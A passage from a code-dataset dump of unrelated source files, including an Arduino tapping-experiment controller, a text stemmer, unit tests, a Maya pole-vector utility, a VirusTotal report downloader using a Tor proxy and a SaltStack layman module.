!= empty_string:\n if(len(chars) == 1):\n print(\"A one letter word is by definition a palindrome\\n\")\n else:\n # init\n is_palindrome = True\n\n # to handle strings of odd length\n compare_length = len(chars) // 2\n\n # push the second half of input string on stack\n for k in range(compare_length, len(chars)):\n stack.push(char_stack, chars[k])\n\n # pop chars and compare to first half of string\n k = 0\n while k < compare_length and is_palindrome:\n ch = stack.pop(char_stack)\n if chars[k].lower() != ch.lower():\n is_palindrome = False\n\n k = k + 1\n\n # display results\n if is_palindrome:\n print(chars, 'is a palindrome\\n')\n else:\n print(chars, 'is NOT a palindrome\\n')\n\n # get next string from user\n chars = input(\"Enter string to check: \")","sub_path":"palindrom.py","file_name":"palindrom.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"364282498","text":"# -*- coding: utf-8 -*-# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 17 11:04:30 2019\n\n@author: paula\n\"\"\"\n\nimport serial, time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport os\nfrom itertools import permutations \nimport glob\n#%% Description\n\n#==============================================================================\n# Saves: - a file per block containing information about all trials in it: their condition and whether if they were valid or not\n# - a file per trial containing the raw data from it\n# - a file per trial containing extracted data from it\n#==============================================================================\n\n#%% Communicate with arduino\n\narduino = serial.Serial('/dev/ttyACM0', 9600)\n#arduino = serial.Serial('/COM3', 9600)\n\n#%% Test arduino communication\n\nmessage = \";S%c;F%c;N%c;A%d;I%d;n%d;X\" % ('R', 'L','B', 3, 500, 10)\narduino.write(message)\n\n#%% Definitions\n\n# define Python user-defined exceptions\nclass Error(Exception):\n \"\"\"Base class for other exceptions\"\"\"\n pass\n\n# define variables\n\nISI = 500;\t\t# interstimulus interval (milliseconds)\nn_stim = 15;\t# number of bips within a 
sequence\n\n# all possible conditions for stimulus and feedback\nall_conditions = [['L','L'], ['L','R'], ['L','N'], ['R','L'], ['R','R'], ['R','N'], ['B','L'], ['B','R'], ['B','N'],['B','B']];\n\n# condition dictionary so we can choose the condition without going through number position\ncondition_dictionary = {\"LL\": 0,\"LR\": 1,\"LN\": 2,\"RL\": 3,\"RR\": 4,\"RN\": 5,\"BL\": 6,\"BR\": 7,\"BN\": 8,\"BB\": 9};\n\n# conditions chosen for the experiment\nconditions_chosen_index = [\n condition_dictionary[\"LL\"],\n condition_dictionary[\"LR\"],\n condition_dictionary[\"RL\"],\n condition_dictionary[\"RR\"],\n condition_dictionary[\"BB\"]\n];\n\n# list of all possible permutations of conditions\nall_possible_orders_conditions = list(permutations(conditions_chosen_index))\n\n# total number of blocks (equal to number of conditions since we have one condition per block)\nN_blocks = len(conditions_chosen_index);\n# number of trials per condition per block\nN_trials_per_block_per_cond = 2;\n\n#%% Experiment\n\n# check for file with names and pseudonyms\nfilename_names = \"/home/paula/Tappingduino3/tappingduino-3-master/DEMO Datos/DEMO_Dic_names_pseud.dat\"\n\ntry:\n f_names = open(filename_names,\"r\")\n\n if os.stat(filename_names).st_size == 0:\n next_subject_number = '001';\n f_names.close();\n else:\n content = f_names.read();\n last_subject_number = int(content [-3:]);\n next_subject_number = '{0:0>3}'.format(last_subject_number + 1);\n f_names.close()\n \nexcept IOError:\n print('El archivo no esta donde deberia, ubicalo en la carpeta correcta y volve a correr esta celda')\n raise\n\n# set subject name for filename\nname = raw_input(\"Ingrese su nombre: \") \n\nf_names = open(filename_names,\"a\")\nf_names.write('\\n'+name+'\\tS'+next_subject_number)\nf_names.close()\n\ncond_order_block = random.choice(all_possible_orders_conditions)\n\nall_possible_orders_conditions.pop(all_possible_orders_conditions.index(cond_order_block))\n\n# run blocks\nblock_counter = 0;\n\nwhile (block_counter < N_blocks):\n \n condition_vector = [] # vector that will contain the specified condition the correct amount of times (it's important to restart it here!)\n for i in range(N_trials_per_block_per_cond):\n condition_vector.append(all_conditions[cond_order_block[block_counter]])\n # total number of trials per block\n N_trials_per_block = len(condition_vector) # unlike N_trials_per_block_per_cond this variable will change if a trial goes wrong\n\n Stim_conds = [] # vector that will contain all stimulus conditions\n Fdbk_conds = [] # vector that will contain all feedback conditions\n for i in range(len(condition_vector)):\n Stim_conds.append(condition_vector[i][0])\n Fdbk_conds.append(condition_vector[i][1])\n \n # run one block\n raw_input(\"Press Enter to start block\") \n \n # set time for file name\n timestr = time.strftime(\"%Y_%m_%d-%H.%M.%S\")\n \n # trial counter\n trial = 0\n \n conditions = [] # vector that will contain exact message sent to arduino to register the conditions played in each trial\n valid_trial = [] # vector that will contain 1 if the trial was valid or 0 if it wasn't\n errors = [] # vector that will contain the type of error that ocurred if any did \n \n # generate filename for file that will contain all conditions used in the trial along with the valid_trials vector \n filename_block = '/home/paula/Tappingduino3/tappingduino-3-master/DEMO Datos/DEMO-S'+next_subject_number+\"-\"+timestr+\"-\"+\"block\"+str(block_counter)+\"-trials\" \n \n while (trial < N_trials_per_block):\n 
raw_input(\"Press Enter to start trial (%d/%d)\" % (trial+1,N_trials_per_block));\n plt.close(1)\n plt.close(2)\n \n # generate raw data file \n filename_raw = '/home/paula/Tappingduino3/tappingduino-3-master/DEMO Datos/DEMO-S'+next_subject_number+\"-\"+timestr+\"-\"+\"block\"+str(block_counter)+\"-\"+\"trial\"+str(trial)+\"-raw.dat\"\n f_raw = open(filename_raw,\"w+\")\n \n # generate extracted data file name (will save raw data, stimulus time, feedback time and asynchrony)\n filename_data = '/home/paula/Tappingduino3/tappingduino-3-master/DEMO Datos/DEMO-S'+next_subject_number+\"-\"+timestr+\"-\"+\"block\"+str(block_counter)+\"-\"+\"trial\"+str(trial)\n \n # wait random number of seconds before actually starting the trial\n wait = random.randrange(10,20,1)/10.0\n time.sleep(wait)\n \n # define stimulus and feedback condition for this trial\n Stim = Stim_conds[trial];\n Resp = Fdbk_conds[trial];\n \n # send message with conditions to arduino\n message = \";S%c;F%c;N%c;A%d;I%d;n%d;X\" % (Stim, Resp,'B', 3, ISI, n_stim)\n arduino.write(message)\n conditions.append(message)\n \n # read information from arduino\n data = []\n aux = arduino.readline()\n while (aux[0]!='E'):\n data.append(aux);\n f_raw.write(aux); # save raw data\n aux = arduino.readline();\n \n # Separates data in type, number and time\n e_total = len(data)\n e_type = []\n e_number = []\n e_time = []\n for event in data:\n e_type.append(event.split()[0])\n e_number.append(int(event.split()[1]))\n e_time.append(int(event.split()[2]))\n \n # Separates number and time according to if it comes from stimulus or response\n stim_number = []\n resp_number = []\n stim_time = []\n resp_time = []\n for events in range(e_total):\n if e_type[events]=='S':\n stim_number.append(e_number[events])\n stim_time.append(e_time[events])\n \n if e_type[events]=='R':\n resp_number.append(e_number[events])\n resp_time.append(e_time[events])\n \n # determine number of stimulus and responses registered\n N_stim = len(stim_time)\n N_resp = len(resp_time)\n \n # close raw data file \n f_raw.close()\n \n # ---------------------------------------------------------------\n # Asynchronies calculation\n \n # vector that will contain asynchronies if they are calculated\n asynchrony = []\n \n try: \n if N_resp > 0: # if there were any responses\n \n j = 0; # stimulus counter\n k = 0; # responses counter for finding first stimuli with decent response\n i = N_resp-1; # responses counter for finding last stimuli with response\n first_stim_responded_index = 0;\n last_resp_index = 0;\n first_stim_responded_flag = False; # flag if there was a stimuli with a recent response\n last_resp_flag = False; \n \n \n # find first stimulus with a decent response\n while j < 5: # if the response doesn't match with any of the 5 first stimuli, then re-do the trial\n diff = stim_time[j]-resp_time[k];\n if abs(diff)<200:\n first_stim_responded_index = j;\n first_stim_responded_flag = True;\n break;\n else:\n j = j+1;\n\n \n if first_stim_responded_flag == True:\n pass;\n else:\n print('Error tipo NFR')\n errors.append('NoFirstResp')\n raise Error \n \n \n # find response to last stimulus (last response that should be considerated)\n while i > 0:\n diff = stim_time[N_stim-1]-resp_time[i]\n if abs(diff)<200:\n last_resp_index = i;\n last_resp_flag = True;\n break;\n else:\n i = i-1;\n \n if last_resp_flag == True:\n pass;\n else:\n print('Error tipo NLR')\n errors.append('NoLastResp')\n raise Error \n \n \n # new vectors of stimulus and responses that only contain those that have a pair 
of the other type \n stim_paired = stim_time[first_stim_responded_index:]\n resp_paired = resp_time[k:(last_resp_index+1)]\n N_stim_paired = len(stim_paired)\n N_resp_paired = len(resp_paired)\n \n if N_stim_paired == N_resp_paired:\n \n # the trial is valid! then:\n valid_trial.append(1)\n errors.append('NoError') \n \n # Calculate and save asynchronies\n for k in range(N_stim_paired):\n asynchrony.append(stim_paired[k]-resp_paired[k])\n \n #==============================================================================\n # Plot all pair of stimulus and feedback\n# plt.figure(1)\n# my_labels = {\"stim\" : \"Stimulus\", \"resp\" : \"Response\"}\n# for j in range(N_stim):\n# plt.axvline(x=stim_time[j],color='b',linestyle='dashed',label=my_labels[\"stim\"])\n# my_labels[\"stim\"] = \"_nolegend_\"\n# \n# for k in range(N_resp):\n# plt.axvline(x=resp_time[k],color='r',label=my_labels[\"resp\"])\n# my_labels[\"resp\"] = \"_nolegend_\"\n# \n# # Put a yellow star on the stimulus that have a paired response.\n# for j in range(N_stim_paired):\n# plt.plot(stim_paired[j],0.5,'*',color='y')\n# \n# plt.axis([min(stim_time)-50,max(resp_time)+50,0,1])\n# \n# plt.xlabel('Tiempo[ms]',fontsize=12)\n# plt.ylabel(' ')\n# plt.grid() \n# plt.legend(fontsize=12)\n \n #==============================================================================\n \n #==============================================================================\n # Plot asynchronies\n# plt.figure(2)\n# plt.plot(asynchrony,'.-')\n# plt.xlabel('# beep',fontsize=12)\n# plt.ylabel('Asynchrony[ms]',fontsize=12)\n# plt.grid() \n #==============================================================================\n \n # go to next trial\n trial = trial + 1;\n \n else:\n if N_stim_paired > N_resp_paired: # if subject skipped an stimuli\n # trial is not valid! then:\n print('Error tipo SS')\n errors.append('SkipStim')\n else: # if there's too many responses\n # trial is not valid! then:\n print('Error tipo TMR')\n errors.append('TooManyResp')\n \n raise Error\n \n \n else: # if there were no responses\n # trial is not valid! then:\n print('Error tipo NR')\n errors.append('NoResp') \n raise Error\n \n \n except (Error):\n # trial is not valid! 
then:\n valid_trial.append(0)\n \n # appends conditions for this trial at the end of the conditions vectors, so that it can repeat at the end\n Stim_conds.append(Stim_conds[trial])\n Fdbk_conds.append(Fdbk_conds[trial])\n \n # go to next trial\n trial = trial + 1;\n # add 1 to number of trials per block since will have to repeat one\n N_trials_per_block = N_trials_per_block + 1;\n\n # SAVE DATA FROM TRIAL (VALID OR NOT)\n np.savez_compressed(filename_data, raw=data, stim=stim_time, resp=resp_time, asynch=asynchrony)\n\n#==============================================================================\n# # If you want to show plots for each trial\n# plt.show(block=False)\n# plt.show()\n# plt.pause(0.5)\n# \n#==============================================================================\n\n print(\"Fin del bloque!\")\n\n # ask subject what condition of stimulus and responses considers he/she heard\n stim_subject_percep = raw_input(\"Considera que el estimulo llegó por audio izquierdo(L), derecho(R) o ambos(B)?\") \n fdbk_subject_percep = raw_input(\"Considera que su respuesta llegó por audio izquierdo(L), derecho(R) o ambos(B)?\") \n block_cond_subject_percep = [stim_subject_percep, fdbk_subject_percep]\n \n # SAVE DATA FROM BLOCK (VALID AND INVALID TRIALS AND THEIR CONDITIONS) \n np.savez_compressed(filename_block,trials=valid_trial,conditions=conditions,errors=errors,subject_percept=block_cond_subject_percep)\n \n # go to next block\n block_counter = block_counter +1;\n\nprint(\"Fin del experimento!\")\n\n#%% A look at the last trial\n\nplt.figure(1)\nmy_labels = {\"stim\" : \"Stimulus\", \"resp\" : \"Response\"}\nfor j in range(N_stim):\n plt.axvline(x=stim_time[j],color='b',linestyle='dashed',label=my_labels[\"stim\"])\n my_labels[\"stim\"] = \"_nolegend_\"\n\nfor k in range(N_resp):\n plt.axvline(x=resp_time[k],color='r',label=my_labels[\"resp\"])\n my_labels[\"resp\"] = \"_nolegend_\"\n\n# Put a yellow star on the stimulus that have a paired response.\nfor j in range(N_stim_paired):\n plt.plot(stim_paired[j],0.5,'*',color='y')\n \nplt.axis([min(stim_time)-50,max(resp_time)+50,0,1])\n \nplt.xlabel('Tiempo[ms]',fontsize=12)\nplt.ylabel(' ')\nplt.grid() \nplt.legend(fontsize=12)\n\nplt.figure(2)\nplt.plot(asynchrony,'.-')\nplt.xlabel('# beep',fontsize=12)\nplt.ylabel('Asynchrony[ms]',fontsize=12)\nplt.grid() \n\n\n#%% Loading data\n\n#def Loading_data(subject_number,block, trial, *asked_data):\n# # IMPORTANTE: DAR INPUTS COMO STRING\n#\n# if trial is None:\n# file_to_load = glob.glob('/home/paula/Tappingduino3/tappingduino-3-master/Datos/S'+subject_number+\"*-block\"+str(block)+\"-trials.npz\") \n# else:\n# file_to_load = glob.glob('/home/paula/Tappingduino3/tappingduino-3-master/Datos/S'+subject_number+\"*-block\"+str(block)+\"-trial\"+str(trial)+\".npz\") \n# \n# print(file_to_load[0])\n# npz = np.load(file_to_load[0])\n# if len(asked_data) == 0:\n# print(\"The file contains:\")\n# return sorted(npz)\n# else:\n# data_to_return = []\n# for a in asked_data:\n# data_to_return.append(npz[a]) \n# return data_to_return[:]\n#\n#\n#\n#asynch = Loading_data('002',0,1,'asynch')\n#plt.plot(asynch[0],'.-')\n#plt.xlabel('# beep',fontsize=12)\n#plt.ylabel('Asynchrony[ms]',fontsize=12)\n#plt.grid() ","sub_path":"Código/Comunicación con Python/Versiones Controlador 2019/DEMO -Controlador - Exceptions - 1CondXBlock.py","file_name":"DEMO -Controlador - Exceptions - 
1CondXBlock.py","file_ext":"py","file_size_in_byte":16532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"276559527","text":"import codecs\r\nimport sys\r\nimport os\r\n\r\nclass Stemmer:\r\n def __init__(self, path, write_path):\r\n self.path = path\r\n self.dict_path = 'suffix.txt'\r\n self.write_path = write_path\r\n self.dict = []\r\n\r\n with codecs.open(self.dict_path, 'rU', 'utf-8') as f:\r\n suffixes = f.read()\r\n suffixes = suffixes.replace('\\n', ' ').replace('\\r', '')\r\n\r\n suff = suffixes.split(' ')\r\n\r\n for item in suff:\r\n if item != '':\r\n self.dict.append(item)\r\n\r\n with codecs.open(path, 'rU', 'utf-8') as f:\r\n self.items = f.read()\r\n \r\n self.out_file = codecs.open(write_path, 'w+', 'utf-8')\r\n self.stem()\r\n return\r\n \r\n def stem(self):\r\n index = []\r\n para = self.items.split('\\n\\n') #assuming that paragraphs are separated by 2 newline characters\r\n\r\n for p in para:\r\n sentences = p.split('.|!|?')\r\n for s in sentences:\r\n words = s.split(' ')\r\n for word in words:\r\n punc = '' #stores the punctuation present at the end of the word, if any\r\n isPunc = False #checks if a word has any punctuation attached to it\r\n for i in range(1, len(word)):\r\n if word.endswith('.') or word.endswith('?') or word.endswith('?') or word.endswith(','):\r\n new_word = word[i : len(word) - 1]\r\n isPunc = True\r\n punc = word[len(word) - 1]\r\n else:\r\n new_word = word[i :]\r\n rep_word = word[0 : i]\r\n if isPunc:\r\n rep_word += punc\r\n if new_word in self.dict:\r\n self.items = self.items.replace(word, rep_word)\r\n \r\n self.out_file.write(self.items)\r\n\r\ndir1 = 'test_copy/'\r\ndir2 = 'test_stemmed/'\r\nfiles = os.listdir(dir1)\r\nfor fileName in files:\r\n\tfilepath1 = dir1 + fileName\r\n\tfilepath2 = dir2 + fileName\r\n\tpath = filepath1\r\n\twrite_path = filepath2\r\n\tlist = [Stemmer(path, write_path)]","sub_path":"stemmer_test.py","file_name":"stemmer_test.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"124163677","text":"import numpy as np\nfrom scipy.special import erfc, erf, expi\nimport matplotlib.pyplot as plt\n\nt=np.arange(1000)/5\ndt=t[1]-t[0]\ntau=5\nT=40\ns=1\nbeta=45\n\nA=(1/tau-beta/tau**2*expi(beta/tau)*np.exp(-beta/tau))*np.exp(-t/tau)+beta/tau**2*expi((beta+t)/tau)*np.exp(-(beta+t)/tau)-beta/(tau*(beta+t))\nB=np.exp(-0.5*(t-T)**2/s**2)\nC=np.convolve(A,B)[:1000]\nplt.figure()\nplt.plot(t, C, '-.')\nplt.show()\n","sub_path":"AnalysisE/fit/Cs137/1ns/temp/try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"528606018","text":"import src.checkFile as checkFile\nfrom unittest import mock\nimport pytest\n\n\nclass Args:\n pass\n\n\nargs = Args()\nargs.file = \"resources/test.html\"\nargs.secureHttp = None\nargs.json = None\nargs.all = None\nargs.good = None\nargs.bad = None\nargs.ignoreFile = None\nargs.telescope = None\n\n\ndef test_no_file_exception():\n args.file = \"wrong/file/path\"\n\n with pytest.raises(FileNotFoundError):\n checkFile.checkFile(args)\n\n args.file = \"resources/test.html\"\n\n\n@mock.patch(\"src.checkFile.checkFile.headRequest\")\ndef test_headRequest_200(mock_headRequest):\n\n link = \"http://google.com\"\n mock_headRequest.return_value = {\"url\": link, \"status\": 200, \"secured\": False}\n cF = checkFile.checkFile(args)\n\n assert 
cF.headRequest(link) == {\n \"url\": \"http://google.com\",\n \"status\": 200,\n \"secured\": False,\n }\n\n\n@mock.patch(\"src.checkFile.checkFile.headRequest\")\ndef test_headRequest_404(mock_headRequest):\n\n link = \"http://google.cim\"\n mock_headRequest.return_value = {\"url\": link, \"status\": 404, \"secured\": False}\n cF = checkFile.checkFile(args)\n\n assert cF.headRequest(link) == {\n \"url\": \"http://google.cim\",\n \"status\": 404,\n \"secured\": False,\n }\n\n\ndef test_parseWebAddress():\n\n lineToParse = \"https://www.google.com/search?q=help\"\n\n cF = checkFile.checkFile(args)\n\n assert cF.parseWebAddress(lineToParse) == \"https://www.google.com/search?q=help\"","sub_path":"tests/test_checkFile.py","file_name":"test_checkFile.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"355683525","text":"import requests\nimport json\nimport random\nimport logging\nimport time\nimport os\n\n\nclass VTReportDownloader(object):\n\n def __init__(self, _url_list=[]):\n self.url_list = _url_list\n # self.TorInit = TorInit(socks_port=9050)\n # self.TorInit._startTorProxy(kill=kill)\n self.user_agent = ''\n self.proxies = {\n # 'http': 'socks5h://127.0.0.1:9050',\n 'https': 'socks5h://127.0.0.1:9050'\n }\n\n def _sys_sleep(self):\n u = random.uniform(0, 0.25)\n logging.info('system sleeps {} seconds...'.format(u))\n time.sleep(u)\n\n def get_page_source(self, url):\n if url is None:\n return None\n s = requests.Session()\n s.proxies = self.proxies\n headers = {\n 'User-Agent': self.user_agent,\n }\n # Make the HTTP request through the session.\n r = s.get(url, headers=headers)\n # Check if the proxy was indeed used (the text should contain the proxy IP).\n if r.status_code == 200:\n r.encoding = 'utf-8'\n html_contnet = r.text\n logging.info('Report downloaded.')\n return html_contnet\n return None\n\n\nif __name__ == '__main__':\n\n pass\n","sub_path":"vt_download_samples/vt_report_downloader.py","file_name":"vt_report_downloader.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"151756092","text":"import scipy.io as scio\nimport os\nimport numpy as np\nimport shutil\nimport pandas as pd\n\ndef pro1(path,targetFolder):\n if not os.path.exists(targetFolder):\n os.mkdir(targetFolder)\n list_dirs = os.walk(path)\n for root, dirs, files in list_dirs:\n for f in files:\n if \"导\" in root:\n city = root.split('\\\\')[1]\n if not os.path.exists(os.path.join(targetFolder,city)):\n os.mkdir(os.path.join(targetFolder,city))\n print(os.path.join(root, f))\n shutil.copy(os.path.join(root, f),os.path.join(targetFolder,city,f))\n\ndef csvTonNumpy(path):\n # print(sorted(os.listdir(\"../raw_data\")))\n classNames = sorted(os.listdir(path))\n print(classNames)\n\n dictName = {}\n for i in range(len(classNames)):\n dictName[classNames[i]] = i\n print(dictName)\n\n count = 0;\n for classname in classNames:\n folder = os.path.join(path, classname)\n for basename in os.listdir(folder):\n file = os.path.join(folder, basename)\n data = pd.read_csv(file, header=-1).values[:, 1]\n x = np.reshape(data, (1, len(data)))\n y = np.zeros((x.shape[0], 1)) + dictName[classname]\n # print(file)\n # print(data.shape)\n if count == 0:\n allX = x;\n allY = y;\n else:\n allX = np.vstack((allX, x))\n allY = np.vstack((allY, y))\n count += 1\n print(count)\n\n\n np.save('allX.npy',allX)\n np.save('allY.npy', allY)\n print(allY)\n 
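# A minimal alternative sketch (the rows/labels names are illustrative, not\n    # part of this script): np.vstack inside the loop above re-copies the whole\n    # array on every iteration, so appending to plain lists and stacking once\n    # at the end is equivalent but linear instead of quadratic:\n    #     rows.append(x); labels.append(y)                 # inside the loop\n    #     allX, allY = np.vstack(rows), np.vstack(labels)  # once, after it\n    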
print(allX.shape)\n print(allY.shape)\n\ndef pro2(path,targetFolder):\n years=['2014','2015','2016','2017'];\n list_dirs = os.walk(path)\n for root, dirs, files in list_dirs:\n for f in files:\n if \"导\" in root:\n city = root.split('\\\\')[1]\n if not os.path.exists(os.path.join(targetFolder, city)):\n os.mkdir(os.path.join(targetFolder, city))\n for year in years:\n if year in root:\n break;\n if not os.path.exists(os.path.join(targetFolder, city,year)):\n os.mkdir(os.path.join(targetFolder, city,year))\n print(os.path.join(root, f))\n shutil.copy(os.path.join(root, f), os.path.join(targetFolder, city, year,f))\n\nif __name__=='__main__':\n path=\"./raw_data\"\n #\n # pro1(path,\"./data/pro1_data\")\n csvTonNumpy(\"./data/pro1_data\")\n\n # pro2(path, \"./data/pro2_data\")\n # for folder in os.listdir(\"./data/pro2_data\"):\n # csvTonNumpy(os.path.join(\"./data/pro2_data\",folder))\n\n\n\n\n\n\n","sub_path":"python/lstmPre10/predict_pro1/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"625958305","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport unittest\nimport init_env\nimport mock\nfrom ut_base import BaseTestCase\nfrom modules.alert.trigger_manage import TriggerManager\n\n\nclass TestTriggerManage(BaseTestCase):\n \"\"\"\n \"\"\"\n def setUp(self):\n super(TestTriggerManage, self).setUp()\n self.interval_config = {\"type\": \"interval\",\n \"timeInterval\": 20,\n \"timeUnit\": \"s\",\n \"startDateTime\": \"2016-09-15 19:23:00\"}\n\n self.interval_time_units = {\"s\": 0, \"m\": 0, \"h\": 0, \"d\": 0, \"w\": 0}\n\n self.datetime_config = {\"type\": \"dateTime\",\n \"dateTime\": \"2022-09-15 22:00:00\"}\n\n def convert_to_seconds(self, time_interval, time_unit):\n \"\"\"\n \"\"\"\n unit_seconds = {'s': 1, 'm': 60, 'h': 3600, 'd': 86400, 'w': 604800}\n return int(time_interval) * unit_seconds[time_unit]\n\n def test_interval_trigger(self):\n \"\"\"\n 测试生成时间间隔触发器\n \"\"\"\n # case1: 时间单位不正确\n wrong_units = ['S', 'H', 'D', 'Y', 'y', 'W']\n for unit in wrong_units:\n self.interval_config['timeUnit'] = unit\n self.assertRaises(Exception, TriggerManager.interval_trigger, self.interval_config)\n\n # case2: 时间间隔值错误\n wrong_interval = [-2, 'x', 0]\n self.interval_config['timeUnit'] = 'm'\n for interval in wrong_interval:\n self.interval_config['timeInterval'] = interval\n self.assertRaises(Exception, TriggerManager.interval_trigger, self.interval_config)\n\n # case3: 起始时间格式不正确\n wrong_start_time = [\"2016/08/09 19:23:00\", \"08-15-2016 19:23:00\"]\n self.interval_config['timeInterval'] = 10\n self.interval_config['timeUnit'] = 'm'\n for start_time in wrong_start_time:\n self.interval_config['startDateTime'] = start_time\n self.assertRaises(Exception, TriggerManager.interval_trigger, self.interval_config)\n\n # case3: 正确的时间间隔和单位\n interval_list = [1, 7, 20, 60, 100]\n unit_list = ['m', 'h', 'd', 'w']\n start_time_list = ['2016-09-15 19:23:00',\n \"2016-09-15 19:23\",\n \"2016-09-15 19\",\n \"2016-09-15\"]\n\n for interval in interval_list:\n for unit in unit_list:\n for start_time in start_time_list:\n self.interval_config['timeInterval'] = interval\n self.interval_config['timeUnit'] = unit\n self.interval_config['startDateTime'] = start_time\n\n trigger = TriggerManager.interval_trigger(self.interval_config)\n seconds = self.convert_to_seconds(interval, unit)\n self.assertEqual(seconds, int(trigger.interval_length))\n\n\nif __name__ == '__main__':\n 
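# Standard unittest entry point; a single case can also be selected from the\n    # command line, e.g.:\n    #     python -m unittest test_trigger_manage.TestTriggerManage.test_interval_trigger\n    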
unittest.main()\n","sub_path":"docker/container_install_script/docker-container-installer/anyrobot/manager/manage_server/tests/ut_modules/test_alert/test_trigger_manage.py","file_name":"test_trigger_manage.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252646618","text":"import os\nimport json\n\ndir_path = os.path.dirname(__file__)\nin_path = os.path.join(dir_path, 'symbols_unicode.json')\nout_path = os.path.join(dir_path, 'alphabet.json')\n\n# Load ipa symbols\nwith open(in_path, 'r') as f:\n data = json.load(f)\n\n# Create alphabet format\nsymbols = {}\n\nfor k, v in data.items():\n for code in v:\n char = chr(int(code, 16))\n\n symbols[char] = {\n 'hex': code\n }\n\nout_data = {\n 'symbols': symbols,\n 'normalizations': {\n 'ɡ': ['g'],\n }\n}\n\n# Write\nwith open(out_path, 'w', encoding='utf-8') as f:\n json.dump(out_data, f, indent=4, ensure_ascii=False)\n","sub_path":"scripts/alphabets/ipa/create_alphabet_file.py","file_name":"create_alphabet_file.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"415170969","text":"from __future__ import absolute_import\n\nimport maya.OpenMaya as om\nimport maya.cmds as cmds\n\nfrom rigging.tools import utils as rt_utils\n\n\ndef get_poleVec_position(root_pos, mid_pos, end_pos, length):\n root_jnt_vector = om.MVector(root_pos[0], root_pos[1], root_pos[2])\n mid_jnt_vector = om.MVector(mid_pos[0], mid_pos[1], mid_pos[2])\n end_jnt_vector = om.MVector(end_pos[0], end_pos[1], end_pos[2])\n\n line = (end_jnt_vector - root_jnt_vector)\n point = (mid_jnt_vector - root_jnt_vector)\n\n scale_value = (line * point) / (line * line)\n projection_vector = line * scale_value + root_jnt_vector\n\n root_to_mid_length = (mid_jnt_vector - root_jnt_vector).length()\n mid_to_end_length = (end_jnt_vector - mid_jnt_vector).length()\n total_length = root_to_mid_length + mid_to_end_length\n\n pole_vector_position = (mid_jnt_vector - projection_vector).normal() * length + mid_jnt_vector\n\n return pole_vector_position\n\n\ndef get_ikh_poleVec_position(ikHandle, length):\n ik_jnt_list = cmds.ikHandle(ikHandle, q=1, jointList=True)\n ik_jnt_list.append(cmds.listRelatives(ik_jnt_list[-1], children=1, type='joint')[0])\n\n root_joint_position = cmds.xform(ik_jnt_list[0], q=1, ws=1, t=1)\n mid_joint_position = cmds.xform(ik_jnt_list[1], q=1, ws=1, t=1)\n end_joint_position = cmds.xform(ik_jnt_list[2], q=1, ws=1, t=1)\n\n pole_vec_position = get_poleVec_position(root_joint_position, mid_joint_position, end_joint_position, length)\n\n return pole_vec_position\n\n\ndef create_poleVec_locator(ikHandle, constraint=False, length=1):\n locator = cmds.spaceLocator()\n position = cmds.move(get_ikh_poleVec_position(ikHandle, length).x, get_ikh_poleVec_position(ikHandle, length).y,\n get_ikh_poleVec_position(ikHandle, length).z, locator)\n locator = cmds.rename(position, '%s_%s' % (rt_utils.prefix_name(ikHandle), 'pv'))\n\n if constraint:\n poleVector_constraint = cmds.poleVectorConstraint(locator, ikHandle)\n rt_utils.constraint_rename(poleVector_constraint)\n\n return locator, ikHandle\n","sub_path":"rigging/library/utils/poleVector.py","file_name":"poleVector.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"481829725","text":"'''\nSupport for Layman\n\n'''\n\nimport salt.utils\n\ndef 
__virtual__():\n '''\n Only work on Gentoo systems with layman installed\n '''\n if __grains__['os'] == 'Gentoo' and salt.utils.which('layman'):\n return 'layman'\n return False\n\ndef add(overlay):\n '''\n Add the given overlay from the caced remote list to your locally\n installed overlays. Specify 'ALL' to add all overlays from the\n remote list.\n\n Return a list of the new overlay(s) added:\n\n CLI Example::\n\n salt '*' layman.add \n '''\n ret = list()\n old_overlays = list_local()\n cmd = 'layman --quietness=0 --add {0}'.format(overlay)\n __salt__['cmd.retcode'](cmd)\n new_overlays = list_local()\n\n ret = [overlay for overlay in new_overlays if overlay not in old_overlays]\n return ret\n\n\ndef delete(overlay):\n '''\n Remove the given overlay from the your locally installed overlays.\n Specify 'ALL' to remove all overlays.\n\n Return a list of the overlays(s) that were removed:\n\n CLI Example::\n\n salt '*' layman.delete \n '''\n ret = list()\n old_overlays = list_local()\n cmd = 'layman --quietness=0 --delete {0}'.format(overlay)\n __salt__['cmd.retcode'](cmd)\n new_overlays = list_local()\n\n ret = [overlay for overlay in old_overlays if overlay not in new_overlays]\n return ret\n\ndef sync(overlay='ALL'):\n '''\n Update the specified overlay. Use 'ALL' to synchronize all overlays.\n This is the default if no overlay is specified.\n\n overlay\n Name of the overlay to sync. (Defaults to 'ALL')\n\n CLI Example::\n\n salt '*' layman.sync\n '''\n cmd = 'layman --quietness=0 --sync {0}'.format(overlay)\n return __salt__['cmd.retcode'](cmd) == 0\n\ndef list_local():\n '''\n List the locally installed overlays.\n\n Return a list of installed overlays:\n\n CLI Example::\n\n salt '*' layman.list_local\n '''\n cmd = 'layman --quietness=1 --list-local --nocolor'\n out = __salt__['cmd.run'](cmd).split('\\n')\n ret = [line.split()[1] for line in out]\n return 